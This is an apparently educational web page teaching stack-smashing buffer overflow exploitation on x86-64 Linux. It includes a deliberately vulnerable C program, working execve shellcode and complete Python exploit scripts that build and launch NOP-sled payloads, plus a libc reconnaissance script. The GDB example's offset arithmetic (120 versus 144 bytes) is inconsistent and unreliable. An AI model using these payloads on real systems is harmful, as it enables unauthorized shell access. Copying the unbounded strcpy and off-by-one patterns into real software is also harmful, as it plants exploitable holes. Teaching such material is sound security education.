Buffer Overflow Attacks - Learning Module

Loading content...

0/227

Stack Smashing

Smashing the Stack for Fun and Profit

In 1996, Elias Levy (known as Aleph One) published "Smashing the Stack for Fun and Profit" in Phrack Magazine—an underground hacker publication. This seminal article didn't invent stack smashing attacks, but it codified them so clearly that it became the canonical reference for a generation of security researchers and attackers alike.

The title was apt. Stack smashing wasn't just powerful—it was elegant. A carefully crafted string of bytes, sent to a vulnerable program, could rewrite the very fabric of its execution flow. The program's own stack, its trusted workspace for function calls, became the weapon used against it.

In this page, we dissect the mechanics of stack smashing with surgical precision. You'll understand exactly how an overflow becomes an exploit, byte by byte, address by address.

What You Will Learn

By the end of this page, you will understand: the exact structure of exploit payloads, how return addresses are located and overwritten, the role of NOP sleds and shellcode placement, handling practical challenges like null bytes and alignment, and how to calculate offsets for reliable exploitation.

The Classic Stack Smashing Scenario

Let's establish the canonical vulnerable program and trace exactly how an attacker exploits it. We'll use a slightly expanded version of our earlier example:

vulnerable.c
C
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#include <stdio.h>
#include <string.h>
 
// Simulates reading input from network/file/user
void process_request(char *request) {
    char buffer[128];           // 128 bytes allocated
    int request_type = 0;       // Local variable after buffer
    
    // VULNERABLE: No bounds checking on copy
    strcpy(buffer, request);    // Copy until null terminator
    
    if (request_type == 1) {
        printf("Processing admin request...\n");
    } else {
        printf("Received: %s\n", buffer);
    }
}
 
int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <request>\n", argv[0]);
        return 1;
    }
    
    printf("Server processing request...\n");
    process_request(argv[1]);
    printf("Request complete.\n");
    
    return 0;
}

The Stack Layout When process_request Executes

When main calls process_request(argv[1]), the stack is arranged as follows (x86-64 architecture, simplified):

Stack Layout During process_request Execution (Growing Downward)
Stack Address	Content	Size	Purpose
RSP+0x00	buffer[0..7]	8 bytes	Start of vulnerable buffer
RSP+0x08	buffer[8..15]	8 bytes	...
...	...	...	...
RSP+0x78	buffer[120..127]	8 bytes	End of 128-byte buffer
RSP+0x80	request_type	4 bytes	Local variable (int)
RSP+0x84	Padding	4 bytes	Alignment padding
RSP+0x88	Saved RBP	8 bytes	Caller's frame pointer
RSP+0x90	Return Address	8 bytes	⚠️ Address in main() to return to
RSP+0x98	main's stack frame...	...	Caller's context

The Attack Path

If we provide input longer than 128 bytes:

Bytes 0-127: Fill buffer (as intended)
Bytes 128-131: Overwrite request_type
Bytes 132-135: Overwrite alignment padding
Bytes 136-143: Overwrite saved RBP (frame pointer)
Bytes 144+: Overwrite the return address

When process_request executes its epilogue (leave; ret), the CPU:

Restores RSP from the corrupted RBP (potentially misdirecting the stack)
Pops the corrupted return address into RIP
Jumps to whatever address we placed there

We now control where the program executes next.

Offset Calculation is Critical

The exact offset from buffer start to return address depends on: buffer size, local variable sizes, compiler padding/alignment decisions, calling convention, and architecture (32-bit vs 64-bit). These values must be determined empirically through debugging or pattern analysis—they're not purely predictable from source code.

Anatomy of an Exploit Payload

A stack smashing exploit payload is more than just "a lot of data followed by an address." Professional exploit development requires understanding each component's purpose and the constraints that shape payload construction.

Converting Mermaid diagram...

Component 1: NOP Sled (Landing Zone)

The NOP (No OPeration) sled consists of many NOP instructions (opcodes like \x90 on x86). Its purpose is to increase the target area for the redirected execution.

Why is this necessary? ASLR (Address Space Layout Randomization) and slight variations in memory layout mean we often can't predict the exact address of our shellcode. If we aim for the middle of a NOP sled instead of the shellcode start, we have a much larger margin of error. Execution slides down the NOPs until it reaches the shellcode.

Component 2: Shellcode (Payload)

Shellcode is the actual malicious machine code. Common shellcode types:

Spawn a shell: Execute /bin/sh (local privilege escalation)
Reverse shell: Connect back to attacker's machine
Bind shell: Listen on a port for attacker's connection
Download and execute: Fetch second-stage payload

Component 3: Padding

Filler bytes to reach the exact offset of the return address. Often uses recognizable patterns like AAAA... during development, then replaced with NOP bytes or junk in final exploit.

Component 4: Return Address

The address that overwrites the saved return address on the stack. This must point back into our NOP sled or directly to our shellcode. Getting this right is the crux of reliable exploitation.

exploit_structure.py
Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#!/usr/bin/env python3
"""
Classic stack smashing exploit structure
Target: vulnerable.c compiled without protections
Architecture: x86-64 Linux
"""
 
# Configuration
buffer_size = 128
local_vars_size = 8           # request_type + padding
saved_rbp_size = 8
offset_to_ret = buffer_size + local_vars_size + saved_rbp_size  # 144 bytes
 
# Component 1: NOP sled (landing zone)
NOP = b"\x90"
nop_sled = NOP * 64           # 64 NOPs for landing area
 
# Component 2: Shellcode - execve("/bin/sh", NULL, NULL)
# This is 27-byte x86-64 Linux shellcode (example)
shellcode = (
    b"\x48\x31\xf6"              # xor rsi, rsi
    b"\x48\xbf\x2f\x62\x69\x6e"  # movabs rdi, '/bin//sh'
    b"\x2f\x2f\x73\x68"
    b"\x57"                      # push rdi
    b"\x48\x89\xe7"              # mov rdi, rsp
    b"\x48\x31\xd2"              # xor rdx, rdx
    b"\xb0\x3b"                  # mov al, 59 (execve syscall)
    b"\x0f\x05"                  # syscall
)
 
# Component 3: Padding to reach return address
current_length = len(nop_sled) + len(shellcode)
padding_needed = offset_to_ret - current_length
padding = b"A" * padding_needed
 
# Component 4: Return address (pointing into NOP sled)
# This address must be determined empirically!
# Example: stack address during debugging
return_addr = 0x7fffffffdea0  # MUST be adjusted per target
ret_addr_bytes = return_addr.to_bytes(8, 'little')
 
# Construct final payload
payload = nop_sled + shellcode + padding + ret_addr_bytes
 
print(f"Payload size: {len(payload)} bytes")
print(f"NOP sled: {len(nop_sled)} bytes")
print(f"Shellcode: {len(shellcode)} bytes")
print(f"Padding: {len(padding)} bytes")
print(f"Return address: {hex(return_addr)}")
 
# Write payload to file or use directly
with open("payload.bin", "wb") as f:
    f.write(payload)

Shellcode Constraints

Shellcode must avoid bytes that would terminate the copy (null bytes for strcpy, newlines for gets), be position-independent (no hardcoded absolute addresses), fit within the available buffer space, and work on the target architecture/OS. Writing reliable shellcode is an art in itself.

Finding the Return Address Offset

Determining the exact offset from the buffer start to the return address is crucial. Too short, and we don't overwrite it; too long, and we corrupt memory beyond, potentially crashing before we gain control. Several techniques are used:

Offset Discovery Techniques

•Manual Calculation — Calculate from buffer size + local variables + saved registers. Requires understanding compiler behavior and calling conventions. Error-prone due to alignment and optimization differences.
•Pattern Generation — Create a unique non-repeating pattern (e.g., Aa0Aa1Aa2...). Feed it to the program, and when it crashes, the overwritten RIP contains a unique substring. Look up that substring to find the exact offset.
•Binary Search — Start with a large input and observe the crash address. Refine the payload length using binary search until the crash address precisely matches your controlled bytes.
•Debugger Analysis — Attach GDB, set a breakpoint after the vulnerable copy, examine the stack layout directly. Most accurate but requires local access and debugging ability.

find_offset.py
Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#!/usr/bin/env python3
"""
Pattern-based offset discovery using pwntools
"""
 
from pwn import *
 
# Generate a cyclic pattern of 200 bytes
pattern = cyclic(200)    # Creates 'aaaabaaacaaadaae...'
print(f"Pattern: {pattern[:50]}...")
 
# After crash, if RIP = 0x6161616a ('jaaa' in little-endian)
# Find the offset:
crash_value = 0x6161616a  
offset = cyclic_find(crash_value)
print(f"Offset to return address: {offset} bytes")
 
# Alternative: Find from substring
# If crash shows RIP contains 'jaaa':
offset_str = cyclic_find(b'jaaa')
print(f"Offset (from string): {offset_str}")
 
# Example using pwntools for complete exploit development
context.arch = 'amd64'
context.os = 'linux'
 
# Create exploit payload once offset is known
def create_exploit(offset, target_addr):
    payload = b"A" * offset           # Fill to return address
    payload += p64(target_addr)       # Overwrite with target
    return payload
 
# Generate pattern file for manual testing
with open("pattern.txt", "wb") as f:
    f.write(pattern)
    
print("\n[*] Feed pattern.txt to vulnerable program")
print("[*] On crash, check register values or core dump")
print("[*] Use cyclic_find(crash_value) to get offset")

Practical Demonstration with GDB

Here's how to find the offset using a debugger:

gdb_offset_finding.txt
GDB Session
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ gdb -q ./vulnerable
(gdb) set disable-randomization on   # Disable ASLR for testing
(gdb) break process_request
(gdb) run AAAAAAAAAAAAtest
 
# At breakpoint, examine stack layout:
(gdb) info frame
Stack level 0, frame at 0x7fffffffe000:
 rip = 0x401196 in process_request; saved rip = 0x401223
 called by frame at 0x7fffffffe020
 
(gdb) x/20gx $rsp
0x7fffffffdf70: 0x0000000000000000  0x0000000000000000  <- buffer starts
0x7fffffffdf80: 0x0000000000000000  0x0000000000000000
...
0x7fffffffdfef: 0x0000000000000000  <- buffer ends (128 bytes)
0x7fffffffdff0: 0x00007fffffffe010  <- saved RBP
0x7fffffffdff8: 0x0000000000401223  <- return address (144 bytes from start)
 
# Calculate: buffer at 0x7fffffffdf80, ret addr at 0x7fffffffdff8
# Offset = 0x7fffffffdff8 - 0x7fffffffdf80 = 0x78 = 120 bytes
# (Note: Actual offset may vary based on compilation)
 
(gdb) x/gx $rbp+8
0x7fffffffdff8: 0x0000000000401223   # Confirms return address location
 
# Now we know: 144 bytes to reach return address
 

Compiler Variations

Different compilers, optimization levels, and even compiler versions can produce different stack layouts. An exploit developed on GCC 9 might fail on GCC 11 due to different alignment decisions. Always test exploits against the exact target binary.

The Null Byte Problem

One of the most significant constraints in exploit development is handling null bytes (\x00). String functions like strcpy, gets, and sprintf treat null bytes as string terminators. If your payload contains a null byte, the copy stops there, and the rest of your payload never reaches its destination.

Null Byte Sources

•Addresses with zero bytes: 0x00401234 contains null
•Small integers in addresses: High bytes often zero on 64-bit
•Shellcode MOV instructions: mov eax, 0 contains nulls
•String terminators: Embedded strings need terminators

Null Byte Avoidance

•Address selection: Find addresses without null bytes
•XOR encoding: xor eax, eax instead of mov eax, 0
•Self-modifying code: Decode payload at runtime
•Polymorphic shellcode: Encode payload, prepend decoder

null_free_techniques.asm

Assembly

; PROBLEM: This shellcode contains null bytes
; mov eax, 0x0000003b    ; 3b 00 00 00 - THREE null bytes!
; mov rdi, 0             ; Contains nulls
 
; SOLUTION: Null-free equivalents
 
; Instead of: mov eax, 0
xor eax, eax             ; Zero register without null bytes
 
; Instead of: mov rax, 0
xor rax, rax
 
; Instead of: mov al, 59 (execve = 59 = 0x3b)
push 59
pop rax                  ; Avoid null bytes in immediate
 
; Instead of: mov rdi, address_with_nulls
; Use stack to build strings:
xor rdi, rdi
push rdi                 ; Push null terminator
mov rdi, 0x68732f2f6e69622f  ; '/bin//sh' (8 bytes, no nulls)
push rdi
mov rdi, rsp            ; Point RDI to our string
 
; Instead of: mov rsi, 0
xor rsi, rsi            ; NULL for argv
 
; Instead of: mov rdx, 0  
xor rdx, rdx            ; NULL for envp
 
; Full null-free execve shellcode for x86-64:
; xor rsi, rsi           ; argv = NULL
; push rsi               ; null terminator for string
; mov rdi, 0x68732f2f6e69622f  ; '/bin//sh'
; push rdi
; mov rdi, rsp           ; pointer to '/bin//sh'
; xor rdx, rdx           ; envp = NULL
; push 59
; pop rax                ; syscall number for execve
; syscall

The 64-bit Address Challenge

On 64-bit systems, virtual addresses for user space are typically in the range of 0x00007fffffffffff and below. This means the upper two bytes of every user-space address are null!

For example, a stack address like 0x00007fffffffdea0 contains TWO null bytes at the front.

Solutions for 64-bit:

Rely on implicit null bytes: When strcpy stops at the first null in your address, the null bytes are "already there" as padding on the stack. This only works if you're overwriting toward higher addresses.
Use addresses in lower regions: In some scenarios, you can find usable addresses without leading nulls.
Pivoting techniques: Use return-oriented programming (covered later) to avoid needing clean addresses in your initial payload.
Exploit different vulnerability types: read() and memcpy() don't treat null bytes specially, so exploits using these are not constrained.

The Little-Endian Advantage

On little-endian systems (x86, x86-64), multi-byte values are stored with the least significant byte first. For the address 0x00007fffffffdea0, the bytes in memory are: a0 de ff ff ff 7f 00 00. The null bytes come LAST. If we're overwriting just enough to reach the return address and leverage implicit nulls, we only need to write the first 6 non-null bytes.

Address Space and Targeting

Once we control the return address, we need to redirect it somewhere useful. The target depends on what we want to execute and what addresses are available.

Classic Targeting Strategies

•Target 1: Return to Buffer — Point the return address back into the buffer we control, where we've placed shellcode. Classic approach. Defeated by DEP/NX (non-executable stack).
•Target 2: Return to Known Code Location — Jump to existing code in the binary or libraries. 'Return-to-libc' jumps to system() with /bin/sh as argument. Doesn't require executable stack.
•Target 3: Return to Heap — If we control heap data, return there. Sometimes heap is executable when stack isn't (rare now).
•Target 4: Return-Oriented Programming (ROP) — Chain small code sequences ('gadgets') ending in RET. Turing-complete computation without injecting new code. Defeats DEP entirely.

Finding Usable Addresses

In the absence of ASLR (or if ASLR is bypassed/weak), addresses are predictable:

Address Sources for Exploitation
Source	Typical Address Range	ASLR Status	Use Case
Main binary (.text)	0x400000 - 0x4fffff	Often not randomized (PIE off)	ROP gadgets, direct function calls
Stack	0x7fff00000000+	Randomized by default	Shellcode (if executable)
Heap	Varies	Partially randomized	Heap spray, object corruption
libc	Varies	Randomized (high entropy)	return-to-libc, ROP gadgets
Shared libraries	Varies	Randomized	Additional gadgets, functions

address_reconnaissance.sh
Bash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#!/bin/bash
# Reconnaissance: Finding useful addresses
 
# Check if PIE (Position Independent Executable) is enabled
checksec --file=./vulnerable
# Output: PIE: No means main binary addresses are fixed
 
# Find libc base address (ASLR disabled or using info leak)
ldd ./vulnerable
# libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7c00000)
 
# Find 'system' function address in libc
readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep "system"
# system@@GLIBC_2.2.5 at offset 0x50d70
 
# Find '/bin/sh' string in libc
strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/sh"
# 0x1d8678 /bin/sh
 
# Calculate absolute addresses (libc_base + offset):
# system: 0x00007ffff7c00000 + 0x50d70 = 0x7ffff7c50d70
# "/bin/sh": 0x00007ffff7c00000 + 0x1d8678 = 0x7ffff7dd8678
 
# Find useful ROP gadgets in binary
ROPgadget --binary ./vulnerable | head -20
 
# Check memory layout of running process
cat /proc/$(pgrep vulnerable)/maps

ASLR Complicates Targeting

With ASLR enabled, library and stack addresses change each run. Exploits must either: (1) Leak an address first to calculate targets, (2) Use fixed addresses from non-PIE binaries, (3) Brute-force a small entropy space (32-bit has only ~12-16 bits of entropy), or (4) Use format string or other bugs to read memory before exploiting.

Complete Exploitation Walkthrough

Let's walk through a complete stack smashing exploit development process against our vulnerable program, assuming a system without modern protections (for educational purposes).

complete_exploit.py
Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
#!/usr/bin/env python3
"""
Complete stack smashing exploit for vulnerable.c
Environment: x86-64 Linux, ASLR disabled, DEP disabled, no stack canaries
Compile target: gcc -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
"""
 
import struct
import subprocess
import sys
 
# =========================================
# STEP 1: Determine offset to return address
# =========================================
# From pattern analysis or debugging: 144 bytes to return address
OFFSET_TO_RET = 144
 
# =========================================
# STEP 2: Develop null-free shellcode
# =========================================
# x86-64 Linux execve("/bin/sh") shellcode (27 bytes, no null bytes)
shellcode = bytes([
    0x48, 0x31, 0xf6,                        # xor rsi, rsi
    0x48, 0xbf, 0x2f, 0x62, 0x69, 0x6e,      # movabs rdi, '/bin//sh'
    0x2f, 0x2f, 0x73, 0x68,
    0x57,                                     # push rdi
    0x48, 0x89, 0xe7,                        # mov rdi, rsp
    0x48, 0x31, 0xd2,                        # xor rdx, rdx
    0xb0, 0x3b,                              # mov al, 59
    0x0f, 0x05                               # syscall
])
 
# =========================================
# STEP 3: Find target address
# =========================================
# With GDB, we found buffer starts at approximately 0x7fffffffdcc0
# We'll aim for middle of NOP sled for reliability
NOP_SLED_SIZE = 100
TARGET_ADDR = 0x7fffffffdcc0 + (NOP_SLED_SIZE // 2)
 
# =========================================
# STEP 4: Construct the payload
# =========================================
def build_payload():
    payload = b""
    
    # NOP sled - landing zone (100 bytes)
    payload += b"\x90" * NOP_SLED_SIZE
    
    # Shellcode (27 bytes)
    payload += shellcode
    
    # Current payload size
    current_size = len(payload)  # 127 bytes
    
    # Padding to reach return address (17 bytes to reach 144)
    padding_needed = OFFSET_TO_RET - current_size
    payload += b"A" * padding_needed
    
    # Return address (8 bytes, little-endian)
    # Note: Upper bytes are nulls, but strcpy will stop there
    # We only need 6 bytes since upper 2 are implicitly null
    payload += struct.pack("<Q", TARGET_ADDR)
    
    return payload
 
# =========================================
# STEP 5: Execute the exploit
# =========================================
def main():
    payload = build_payload()
    
    print(f"[*] Payload size: {len(payload)} bytes")
    print(f"[*] NOP sled: {NOP_SLED_SIZE} bytes")  
    print(f"[*] Shellcode: {len(shellcode)} bytes")
    print(f"[*] Target address: {hex(TARGET_ADDR)}")
    print(f"[*] Offset to return: {OFFSET_TO_RET}")
    
    # Verify no nulls in critical portion
    critical_portion = payload[:OFFSET_TO_RET]
    if b'\x00' in critical_portion:
        print("[!] Warning: Null byte in payload before return address!")
        null_pos = critical_portion.find(b'\x00')
        print(f"[!] Null at offset: {null_pos}")
    
    # Write payload for manual testing
    with open("payload.bin", "wb") as f:
        f.write(payload)
    print("[*] Payload written to payload.bin")
    
    # Execute (WARNING: Only in controlled environment!)
    print("[*] Launching exploit...")
    try:
        # Run vulnerable program with our payload
        result = subprocess.run(
            ["./vulnerable", payload],
            timeout=5
        )
    except Exception as e:
        print(f"[*] Execution resulted in: {e}")
        print("[*] If you see a shell prompt, the exploit succeeded!")
 
if __name__ == "__main__":
    main()
    print("\n[*] If successful, you should have a shell.")
    print("[*] Type 'id' or 'whoami' to verify.")

Execution Flow After Successful Exploit

main() calls process_request(payload)
strcpy copies payload into buffer, overflowing 144+ bytes
Return address now points to our NOP sled (0x7fffffffdcc0+)
Function epilogue executes: leave; ret
CPU pops our address into RIP, jumps to NOP sled
Execution slides through NOPs, reaches shellcode
Shellcode executes execve("/bin/sh", NULL, NULL)
Shell spawned with the process's privileges

If the process ran as root (e.g., a setuid binary or privileged daemon), we now have a root shell.

The Power of Stack Control

This relatively simple technique—overwriting a return address—transforms a memory corruption bug into arbitrary code execution. The combination of predictable memory layout, lack of bounds checking, and executable stacks made this attack devastatingly effective for decades.

Off-by-One Exploitation

One of the most fascinating aspects of stack smashing is that even a single-byte overflow can be enough for exploitation. Off-by-one errors—where a loop writes exactly one byte past the buffer—are common and surprisingly exploitable.

off_by_one.c
C
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
// Classic off-by-one vulnerability
void copy_string(char *dest, const char *src, size_t size) {
    size_t i;
    
    // Bug: Loop condition uses <= instead of <
    // Allows writing one byte past buffer end
    for (i = 0; i <= size; i++) {  // WRONG: should be i < size
        dest[i] = src[i];
        if (src[i] == '\0') 
            break;
    }
}
 
void vulnerable() {
    char buffer[64];
    char *input = get_user_input();  // Returns 64+ byte string
    
    copy_string(buffer, input, 64);
    // If input is 64 bytes + null, we write buffer[64] = '\0'
    // This overwrites one byte of saved RBP!
}

How One Byte Becomes Code Execution

The off-by-one overwrites the least significant byte of the saved frame pointer (RBP). This might seem useless, but consider:

When the function returns, it executes leave which does:
- mov rsp, rbp — RSP gets the corrupted RBP value
- pop rbp — Pops whatever is at corrupted RSP location
The caller also executes leave; ret:
- Its leave uses the corrupted frame chain
- Its ret pops a return address from a memory location we influenced
If we carefully control what value we overwrite that byte with, we can point the frame into our buffer, where we've placed a controlled return address.

This is called "Frame Pointer Overwrite" or "Off-by-One Stack Pivot"

The attack requires:

Knowing or guessing the stack layout
The corrupted LSB points RSP into attacker-controlled data
That data contains a gadget address or shellcode pointer

This demonstrates that security margins matter: even one byte of overflow, in the right place, compromises the system.

Real-World Impact

Off-by-one bugs are among the most commonly found vulnerabilities in code audits. They're easy to introduce (fence-post errors are a classic programming mistake) and often dismissed as 'just one byte.' But as we've seen, one byte can be enough. Always audit loop bounds and buffer size calculations with extreme care.

Summary: Mastering Stack Smashing Mechanics

We've dissected the mechanics of stack smashing—the foundational exploitation technique for buffer overflows. Let's consolidate the key insights.

Key Takeaways

•Stack smashing overwrites the saved return address — Giving attackers control of the instruction pointer (RIP/EIP) when the function returns.
•Exploit payloads have a structured format — NOP sled, shellcode, padding, and return address each serve specific purposes in reliable exploitation.
•Offset determination is critical — Finding the exact byte distance from buffer to return address requires pattern analysis, debugging, or trial and error.
•Null bytes constrain payloads — String functions terminate at nulls, requiring null-free shellcode and careful address selection.
•64-bit addresses contain nulls — But little-endian byte ordering and implicit nulls enable exploitation despite this constraint.
•Even one-byte overflows are exploitable — Off-by-one errors enable frame pointer overwrites that redirect control flow.

What's Next: Code Injection

The next page explores code injection in depth—the development of shellcode, techniques for encoding payloads to bypass filters, and the art of writing position-independent malicious code. We'll examine how attackers craft the payload that executes once they've redirected control flow.

Page Complete

You now understand the precise mechanics of stack smashing attacks: how return addresses are located and overwritten, how exploit payloads are structured, and the practical challenges of reliable exploitation. This foundation is essential for understanding both advanced exploitation techniques and the defenses designed to stop them.